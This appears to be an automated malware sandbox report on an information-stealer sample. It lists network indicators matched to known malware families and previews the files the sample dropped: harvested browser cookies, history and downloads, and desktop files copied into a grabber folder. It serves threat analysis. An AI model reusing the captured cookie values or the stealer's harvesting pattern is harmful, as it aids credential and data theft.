	OXhiMvksgM.exe	Get hash	malicious	XWorm	Browse
	7bZWBYVNPU.exe	Get hash	malicious	XWorm	Browse
	BWoiYc9WwI.exe	Get hash	malicious	XWorm	Browse
	fjijTlM2tu.exe	Get hash	malicious	XWorm	Browse
	gPEbJi1xiY.exe	Get hash	malicious	XWorm	Browse
	dHp58IIEYz.exe	Get hash	malicious	XWorm	Browse
	432mtXKD3l.exe	Get hash	malicious	XWorm	Browse
	l18t80u9zg.exe	Get hash	malicious	XWorm	Browse
104.16.185.241	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRAT	Browse	icanhazip.com/
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar	Browse	icanhazip.com/
	iGxCM2I5u9.exe	Get hash	malicious	Flesh Stealer	Browse	icanhazip.com/
	3K5MXGVOJE.exe	Get hash	malicious	Unknown	Browse	icanhazip.com/
	K6aOw2Jmji.exe	Get hash	malicious	Stealerium	Browse	icanhazip.com/
	jpiWvvEcbp.exe	Get hash	malicious	Stealerium	Browse	icanhazip.com/
	VzhY4BcvBH.exe	Get hash	malicious	AsyncRAT, RedLine, StormKitty, VenomRAT	Browse	icanhazip.com/
	L814CyOxMT.exe	Get hash	malicious	Flesh Stealer, PureLog Stealer, zgRAT	Browse	icanhazip.com/
	GsZkXAmf61.exe	Get hash	malicious	Celestial Rat, EICAR	Browse	icanhazip.com/
	REQUEST FOR QUOTATION.js	Get hash	malicious	PXRECVOWEIWOEI Stealer, PureLog Stealer	Browse	icanhazip.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
marketdedamoroza.webhop.me	22.08.2024.exe	Get hash	malicious	Xmrig	Browse	185.221.198.114
marketdedamoroza.webhop.me	WindowsDefender.exe	Get hash	malicious	Unknown	Browse	185.221.198.114
pastebin.com	http://annavirgili.com	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	172.67.19.24
	http://annavirgili.com	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	172.67.19.24
	KrnlSetup.exe	Get hash	malicious	XWorm	Browse	104.20.3.235
	Revo.Uninstaller.Pro.v5.3.4.exe	Get hash	malicious	Unknown	Browse	104.20.3.235
	Revo.Uninstaller.Pro.v5.3.4.exe	Get hash	malicious	Unknown	Browse	104.20.4.235
	rrats.exe	Get hash	malicious	AsyncRAT	Browse	172.67.19.24
	Q8o0Mx52Fd.exe	Get hash	malicious	Unknown	Browse	104.20.3.235
	Q8o0Mx52Fd.exe	Get hash	malicious	Unknown	Browse	104.20.3.235
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.20.4.235
	Microsoft.doc	Get hash	malicious	Unknown	Browse	104.20.3.235
icanhazip.com	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRAT	Browse	104.16.185.241
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar	Browse	104.16.185.241
	7fE6IkvYWf.exe	Get hash	malicious	Unknown	Browse	104.16.184.241
	iGxCM2I5u9.exe	Get hash	malicious	Flesh Stealer	Browse	104.16.185.241
	T05Dk6G8fg.exe	Get hash	malicious	Unknown	Browse	104.16.184.241
	3K5MXGVOJE.exe	Get hash	malicious	Unknown	Browse	104.16.185.241
	VaXmr82RIb.exe	Get hash	malicious	Unknown	Browse	104.16.184.241
	Pdf Reader.exe	Get hash	malicious	Stealerium	Browse	104.16.184.241
	gKWbina3a4.bat	Get hash	malicious	Stealerium	Browse	104.16.184.241
	K6aOw2Jmji.exe	Get hash	malicious	Stealerium	Browse	104.16.185.241

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	naukri-launcher 10.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	WE8zqotCFj.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	162.159.137.232
	ozAxx9uGHu.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	162.159.136.232
	naukri-launcher 10.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	eCXXUk54sx.exe	Get hash	malicious	Divulge Stealer	Browse	162.159.128.233
	ZS8xEqirxa.exe	Get hash	malicious	LummaC	Browse	104.21.27.188
	wV1Mk5PUmi.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	Rbeu9JMfnq.exe	Get hash	malicious	LummaC	Browse	104.21.50.161
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	172.67.213.48
	fOhq9xghej.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.96.1
CLOUDFLARENETUS	naukri-launcher 10.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	WE8zqotCFj.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	162.159.137.232
	ozAxx9uGHu.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	162.159.136.232
	naukri-launcher 10.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	eCXXUk54sx.exe	Get hash	malicious	Divulge Stealer	Browse	162.159.128.233
	ZS8xEqirxa.exe	Get hash	malicious	LummaC	Browse	104.21.27.188
	wV1Mk5PUmi.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	Rbeu9JMfnq.exe	Get hash	malicious	LummaC	Browse	104.21.50.161
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	172.67.213.48
	fOhq9xghej.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.96.1
SALSGIVERUS	file.exe	Get hash	malicious	XWorm	Browse	147.185.221.24
	NhoqAfkhHL.bat	Get hash	malicious	Unknown	Browse	147.185.221.24
	sora.mpsl.elf	Get hash	malicious	Mirai	Browse	147.160.103.28
	a4lIk1Jrla.exe	Get hash	malicious	Njrat, RevengeRAT	Browse	147.185.221.24
	W6s1vzcRdj.exe	Get hash	malicious	XWorm	Browse	147.185.221.24
	u7e3vb5dfk.exe	Get hash	malicious	XWorm	Browse	147.185.221.24
	aOi4JyF92S.exe	Get hash	malicious	XWorm	Browse	147.185.221.24
	ozgpPwVAu1.exe	Get hash	malicious	XWorm	Browse	147.185.221.22
	PG4w1WB9dE.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	147.185.221.24
	a4BE6gJooT.exe	Get hash	malicious	XWorm	Browse	147.185.221.24

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	MassLogger RAT	Browse	104.20.4.235
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.20.4.235
	Request for Quotations and specifications.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	104.20.4.235
	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	104.20.4.235
	hesaphareketi-01.pdfsxlx..exe	Get hash	malicious	Snake Keylogger	Browse	104.20.4.235
	41570002689_20220814_05352297_HesapOzeti.exe	Get hash	malicious	MassLogger RAT	Browse	104.20.4.235
	malware.ps1	Get hash	malicious	MassLogger RAT	Browse	104.20.4.235
	Shipping Documents.exe	Get hash	malicious	MassLogger RAT	Browse	104.20.4.235
	QUOTES REQUEST FOR PRICES.exe	Get hash	malicious	MassLogger RAT	Browse	104.20.4.235
	T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.20.4.235

Process:	C:\Users\Public\Pictures\xdwdUpdate.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	871
Entropy (8bit):	5.36845336122342
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPyEsOKbbDLI4MWuPOKMAKhap+92n4MNQpVhU9tWzAbDLI4MNux+:ML9E4KaCKDE4KGKMAKh6+84xpcKsXE4w
MD5:	15332C93136041700B0E3D5AEB01CFCE
SHA1:	77EBA09260200C3EA967778E460A7A0D83A2E152
SHA-256:	5B95602CCE052DF6412A02E94AAC5326A41419C13C56B1FE0CE9389D3CB77D30
SHA-512:	419B6BCD31744FE9494F0FB8CF0AA57C59E338898BD5A9832A7C59BE5E478A27D53D40861AF2F4ED38426574781E2DA38237805CB765C7BD582FB8F4C547102A
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d1b08a492d712e019f310913d82efb4d\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\782dd7dd89e97af687ff0bdfb301ea5f\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\d168bb79d8c202ee2de4b8f1cab215dd\Microsoft.VisualBasic.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\3a54af634388e6223cd280a434ab6a59\System.Management.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xdwdpnsvr.exe.log

Process:	C:\Users\user\AppData\Roaming\xdwdpnsvr.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	871
Entropy (8bit):	5.36845336122342
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPyEsOKbbDLI4MWuPOKMAKhap+92n4MNQpVhU9tWzAbDLI4MNux+:ML9E4KaCKDE4KGKMAKh6+84xpcKsXE4w
MD5:	15332C93136041700B0E3D5AEB01CFCE
SHA1:	77EBA09260200C3EA967778E460A7A0D83A2E152
SHA-256:	5B95602CCE052DF6412A02E94AAC5326A41419C13C56B1FE0CE9389D3CB77D30
SHA-512:	419B6BCD31744FE9494F0FB8CF0AA57C59E338898BD5A9832A7C59BE5E478A27D53D40861AF2F4ED38426574781E2DA38237805CB765C7BD582FB8F4C547102A
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d1b08a492d712e019f310913d82efb4d\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\782dd7dd89e97af687ff0bdfb301ea5f\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\d168bb79d8c202ee2de4b8f1cab215dd\Microsoft.VisualBasic.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\3a54af634388e6223cd280a434ab6a59\System.Management.ni.dll",0..

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Browsers\Edge\Cookies.txt

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (311), with CRLF line terminators
Category:	dropped
Size (bytes):	1366
Entropy (8bit):	5.550854713817041
Encrypted:	false
SSDEEP:	24:XMg06Dg0Liro3oTby27fRhuDFmw/cAcBbmXbM/McPTToi4jRuqIcSxw3r:Z4o3oCKoDFxZ5bM/3T4jAESCb
MD5:	077518B835C3FA3C8DD56B516F3C4F09
SHA1:	8E1073BEA890F6E9D420C2DCD322B7492A418F39
SHA-256:	A7BA9FB42DCE7AC978081818555C41FCFC92ADB37C462C4E7A0DE07F4EE4C849
SHA-512:	EDFAFDFD07651DDFCF8447C242866282EB0D4F6ACF1DD86FB4483AE659308D1AB821ADCB940F4992B7C5F7D693E49A3B501F70AB43B74ADD87E19DD78ABA6B42
Malicious:	false
Preview:	.TRUE./.FALSE.13369433597257868.MUID.243215E5327669D43677068133B66811...TRUE./.FALSE.13369433598010327.MUIDB.243215E5327669D43677068133B66811...TRUE./.FALSE.13369433597257941.SRCHD.AF=NOFORM...TRUE./.FALSE.13369433598395523.SRCHHPGUSR.SRCHLANG=en&BRW=HTP&BRH=M&CW=929&CH=886&SCW=1164&SCH=3580&DPR=1.0&UTC=60&DM=0&PV=10.0.0...TRUE./.FALSE.13369433597257954.SRCHUID.V=2&GUID=AF408687C8FA439A8235094D5DC74E53&dmnchg=1...TRUE./.FALSE.13369433598000000.SRCHUSR.DOB=20230805&T=1691260397000...TRUE./.FALSE.13335780797257824.SUID.M...TRUE./.FALSE.13369433598010386.USRLOC.HS=1&ELOC=LAT=51.735923767089844\|LON=14.326889038085938\|N=Cottbus%2C%20Brandenburg\|ELT=4\|...TRUE./.FALSE.13369433597257915._EDGE_V.1...TRUE./.FALSE.13367359998419646._RwBf.ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2023-08-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2023-08-05T18:33:18.5834451+00:00&rwred=0&wls=&wlb=&lka=0&lkt=0

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Browsers\Edge\History.txt

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	171
Entropy (8bit):	5.250072800469101
Encrypted:	false
SSDEEP:	3:RGhR8frSLsBAEXGprO8Dh2i1x3T2GGXQxWzB+0PV8GGrW09LkDVEyRGF6CY4+Geg:Q8fGLsBBGthp3THArBCC4kDVXAp2An
MD5:	6A8A029F13513BD5AD254BD8B9271C62
SHA1:	879464EB955EF40AE963C6A0FDBF418C2C137337
SHA-256:	AE777B9F344C2F2C9F0650B1570C10F5B37EAA84394A82D75B51BFE15DCE75D2
SHA-512:	ECC2A5DDA8E90AAD9F7143DA25426809B8C6225D0C1FDE0AE0A62BA6A0F2EB2129276C7B40820561038306BA2EF12BDD85A1FFE6B48304004AC477AB5D4F3478
Malicious:	false
Preview:	### https://www.bing.com/search?q=regedikt&form=WNSGPH&qs=SW&cvid=1c4c2e2811e44c03a63aad6fcf391716&pq=regedikt&cc=GB&setlang=en-US&wsso=Moderate ### (regedikt - Search) 1.

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Browsers\Firefox\Bookmarks.txt

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	105
Entropy (8bit):	3.860108567348877
Encrypted:	false
SSDEEP:	3:RGtjybXLGSWKHMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWuIpg9OL2RE2m
MD5:	8BB3B064E0A1AD538E576DB7220D1921
SHA1:	E3BEC16F2DD5EE0DB39BDE202B774EA638D70596
SHA-256:	5590388ABE482B1B9FCE8BABCC5B08DF3E6979AF35D86EB4045501068875923A
SHA-512:	356BDF4F5894253859C59ECBE8D0E3C47054B0F36BAFEED4F5B7349CE2B590CE6EFE2EFB16C5FDFA9914E59A830B3646A5916A13EACABCEE3358F225BBB9C1AF
Malicious:	false
Preview:	### Get Help ###.### Customise Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Browsers\Firefox\History.txt

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	94
Entropy (8bit):	4.886397362842801
Encrypted:	false
SSDEEP:	3:RGEnGPHA9lfMJJEFAN2DSLvIJiMhKVX3L2WdXuvn:DG/CF0EFAN2OLciA8d+v
MD5:	61CDD7492189720D58F6C5C975D6DFBD
SHA1:	6966AFE0DEC5B0ABD90291FA12C0F6B7EF73ED43
SHA-256:	2F345865397FF1952921DB0588A6B589BAF30E67A90E11F7064E515AC162E862
SHA-512:	20D5A1C9809DF4F5B9C789042E5B88928A5246F9EB44F9D265CA3AA6FC9544A582B758ECAF6BBB0E9CEE149BD0AAC5E6C63D954541D1B23A7FC11894121CC0AE
Malicious:	false
Preview:	### Firefox Privacy Notice . Mozilla ### (https://www.mozilla.org/en-US/privacy/firefox/) 1.

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Browsers\Google\Cookies.txt

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (514), with CRLF line terminators
Category:	dropped
Size (bytes):	974
Entropy (8bit):	5.96140771981186
Encrypted:	false
SSDEEP:	24:9vKBKh8XSWHT1RbfGnKb1zKb5Rms8/y3Vggtl+7qqv:9viC+HRfb1zKlfAyFg4EOqv
MD5:	31E294D4C2F8AAF36C2166C81D373A94
SHA1:	2B3664622D75E3231463F6333DF552F6F5DAB0D3
SHA-256:	E8FA701DFDEA072BB20C8D58C465D4A277AC9D2EB1796BAFD92C0D2657A4AD2B
SHA-512:	CABBD1CCBAE6797F353BB9EA8DC2438900593F2452423AF05D9FB0A147A7A868B34A4F708BC8322E70CBC2D5109C56C2CF154F1255DBAA6684C9D3C8F7697971
Malicious:	false
Preview:	.google.com.TRUE./.FALSE.13385561990585513.NID.517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu..ogs.google.com.TRUE./.FALSE.13372342811000000.OTZ.7716220_48_52_123900_48_436380...adobe.com.TRUE./.FALSE.13370438847426033.ak_bmsc.20564E410B96EF3539889402094DE020~000000000000000000000000000000~YAAQlUxyaMEs4NiRAQAASccd2xm/y2Zo7QA6+Q0JfmISZOtGTwvrY8g71+hGy8kdY9wiebmazRy7kfEPoJuCS7nlQC4w97P/WsQ+PjoOMLUYYjcqMpuvJVziB2hx1UMsvrBkaUI6F6e2inlwc/YyN/io5dejGN//HclljEhd5EoYKGG+O+Sirx1+9Vh/xIqXfiaH1llrt9oHHD2EgbqLIhthuZhNjqmTDC4yfAdjNLYBLl5+O7OV+vCzqHuwhHvpjh4QmpgYmebYOaYOAqATcbZiw7Um8EFyJlThzgg7J7uJEpAdzDuBgKuyW1GocnGFmRE18jiPgQpim3rveATS1aqG7/pW/Xsc8e6ZMt4uCn6EJEQZdw2JmARwhc0QfOsw8ZBqfLp/fBhoQZk=..helpx.adobe.com.TRUE./.FALSE.13371641248071674.akaas_helpx_audience_segmentation_default.1727167648~rv=12~id=561ecf4a0966fc7609e5e1271a59bf55~rn=..

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Browsers\Google\Downloads.txt

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (325)
Category:	dropped
Size (bytes):	1213
Entropy (8bit):	5.341810414583018
Encrypted:	false
SSDEEP:	24:jND3wWfCA9L6l2GdOE5AFG11H679NS1zAAk4wtrQe3yfuccdLA8v+ovrnL8:jN7Lv9L6vdOWA8nu9NiAAMQWZd3+4nY
MD5:	5A37EE2971786DA3C417B2663B926CF1
SHA1:	BB4E03832DF44D359159DBC62735A5748D10A012
SHA-256:	7CCF3B2D0E459E2B0ADE0EB8839F9BF74757F69E92EEFF9B36B21608F416B04D
SHA-512:	968453CFBB4A312466043E2572D93D28B8E7D169790A6F88F9BEB0DFBB4018E9C2EBB33FB69DED14E4F1063A2A2A060AC10FB583B963B2F9DAA22236FAD0EA3D
Malicious:	false
Preview:	### C:\Users\user\Downloads\Firefox Setup 91.0.1.exe ### (https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release) 0.### C:\Users\user\Downloads\readerdc_uk_xa_crd_install.exe ### (https://get.adobe.com/uk/reader/download/?installer=Reader_DC_2021.005.20060_English_UK_for_Windows&os=Windows%2010&browser_type=KHTML&browser_dist=Chrome&dualoffer=false&mdualoffer=true&cr=false&stype=7662&d=McAfee_Security_Scan_Plus&d=McAfee_Safe_Connect) 0.### C:\Users\user\Downloads\JavaSetup8u301.exe ### (https://www.java.com/download/ie_manual.jsp) 0.### C:\Users\user\Downloads\BIOS320.EXE ### (https://packetstormsecurity.com/files/download/22459/BIOS320.EXE) 0.### C:\Users\user\Downloads\OfficeSetup.exe ### (https://account.microsoft.com/services/?OCID=PROD_Office_CONS_SetupOffice&lang=en-US&refd=setup.office.com) 0.### C:\Users\user\Downloads\autoit-v3-setup.exe ### (https://www.autoitscript.com/site/autoit/downloads/) 0.### C:\Users\user\Downloads\eicar.com.txt ### (https://

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Browsers\Google\History.txt

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	915
Entropy (8bit):	5.131130482267005
Encrypted:	false
SSDEEP:	12:QO9vdmuLICNQvRFdaO94G39x+9BAlX2yEQOJIZYOxu9uNUBOxu9FBO9vVd20H1gc:LLm4QxO2ACLuM/ukdH1FrbUAkerbUAkE
MD5:	BFD9BA7FE6FF1A6A97307A68563104CA
SHA1:	A290D49F84880433F9A5DB7CC8833309F31C9593
SHA-256:	AC7330FCF05FB2E1021FF576F63A67384CE71B37DFD3172D89F651C89FDD6235
SHA-512:	A464A23CF220D523864C6C09A3922F8BB5038B6C190874EA21CAEBBA008FD8ABC50914D1861B38C255B819328451B2646656C0D4352DC89C23C7A71320ACC1D0
Malicious:	false
Preview:	### https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_medium=et ### (Google Chrome - The Fast & Secure Web Browser Built to be Yours) 3.### https://www.google.com/search?q=eicar+test+file&oq=eicar+test+file&aqs=chrome..69i57j0i512l9.2756j0j4&sourceid=chrome&ie=UTF-8 ### (eicar test file - Google Search) 1.### https://www.eicar.org/download-anti-malware-testfile/ ### (Download Anti Malware Testfile . Eicar) 4.### https://secure.eicar.org/eicar.com ### () 1.### https://secure.eicar.org/eicar.com.txt ### () 1.### https://www.google.com/chrome/next-steps.html?brand=CHWL&statcb=0&installdataindex=empty&defaultbrowser=0 ### (Google Chrome Web Browser) 1.### http://helpx.adobe.com/support/reader.html?mv=product ### (Adobe Acrobat Reader Learn & Support) 1.### https://helpx.adobe.com/support/reader.html?mv=product ### (Adobe Acrobat Reader Learn & Support) 1.

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\BJZFPPWAPT.png

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704346314649071
Encrypted:	false
SSDEEP:	24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
MD5:	8B66CD8FCBCEB253D75DB5CDE6291FA2
SHA1:	6CE0386190B9753849299B268AA7B8D15F9F72E2
SHA-256:	51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
SHA-512:	7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
Malicious:	false
Preview:	BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\BNAGMGSPLO.docx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701704028955216
Encrypted:	false
SSDEEP:	24:t3GWl91lGAalI86LPpWzUkxooDp2Eb6PEA7lhhzhahpmvYMp+wq2MseSnIrzv:t2Wl91lGAad/xoo12e6MyF4/jMp+t2Mh
MD5:	5F97B24D9F05FA0379F5E540DA8A05B0
SHA1:	D4E1A893EFD370529484B46EE2F40595842C849E
SHA-256:	58C103C227966EC93D19AB5D797E1F16E33DCF2DE83FA9E63E930C399E2AD396
SHA-512:	A175FDFC82D79343CD764C69CD6BA6B2305424223768EAB081AD7741AA177D44A4E6927190AD156D5641AAE143D755164B07CB0BBC9AA856C4772376112B4B24
Malicious:	false
Preview:	BNAGMGSPLOQNKLVQWYYWYGDTNIHHPSGKYBNBNGFSZGYYFUVNSOYTAMZPOIOKMFFWDJIYCJGTWZSMXADBSJDEKDTPXDVYBIZFLSTFISYXAKAYQWPLDFAWXXNTSVHRLCINNTRJHMBFQAQBHFRSHDDRJZGIFSOFSRODXCWFIUZRXRQSOCPSXKXNEHLQYKIBJRTMMHJOIZSWESTHTXPULAPGLZHBOLMPQWYSWWOGRJQGYWDWWZMHZMTDMRWBSPIXHCFFOHTJSOAULKIFZVXPTYEBTBEXGQNBQAECQOJGHTKIAXUJLSLPBKTTRORROLNTKPDPOMSZBBLUYFRZXYZSVBGBEMGTACDCBJNXKAMZMCYEWGKSUENLKBJSZIPKQGYXMJTJXBELNVMAZHRUESZSTWROIUXLLMQPYLVQYLCOMOCGPSMJQGILSDDRUUXDRUCCVECNPLWHJLTHCPBZIKDUNRJMJIOQOCHVVNIQFFXFKFHTCVEEAXHTLJMWIUAWAMHGIGQCQJZGXBEDCRRZCNVYKCPWVJCRXIGXZYJENNARSZZREAOODIGZVBXFPAHTZNKNQHLNNETJICOVQGFLQSGSLCOYMPYDSGOPNUXAMCIJBJPJBAABYHKBKWCUAXUHNOCSSTHZYJXPLMFVJQAJDDSNEVXLRUYEQEKUKUIAOQAQJMNLHOUFLFUDMCWRNYNNLOACVSDXDNNBOGQOYGOZTWUOFZYLZQXJEGPQNQFLLILMQUJLCLUOOAOAQRCWMGKHGFJRPSFVQPCSCUDFVYSGDQIHJWSUDEAMVIANGMMFSJJTPNRYYSJYDFLUXJZGSYAAUHOEPMQIZZRSZDCXHRCIPUERSVKWEBDJCXEWWKPAHBVZESVEWPJTYRBKLHQRRPGDGQPGTNNFRMWNTGWIZDBPSGFQDFZWTVLRAOKRBHWFHBPZUBSCFBAMHEWXUIUXMKHPOCNYWNKSRYBQKSUWJLJRNBFNMTDBSZDXVFSLPDQEDCNYELVD

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\BNAGMGSPLO.jpg

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701704028955216
Encrypted:	false
SSDEEP:	24:t3GWl91lGAalI86LPpWzUkxooDp2Eb6PEA7lhhzhahpmvYMp+wq2MseSnIrzv:t2Wl91lGAad/xoo12e6MyF4/jMp+t2Mh
MD5:	5F97B24D9F05FA0379F5E540DA8A05B0
SHA1:	D4E1A893EFD370529484B46EE2F40595842C849E
SHA-256:	58C103C227966EC93D19AB5D797E1F16E33DCF2DE83FA9E63E930C399E2AD396
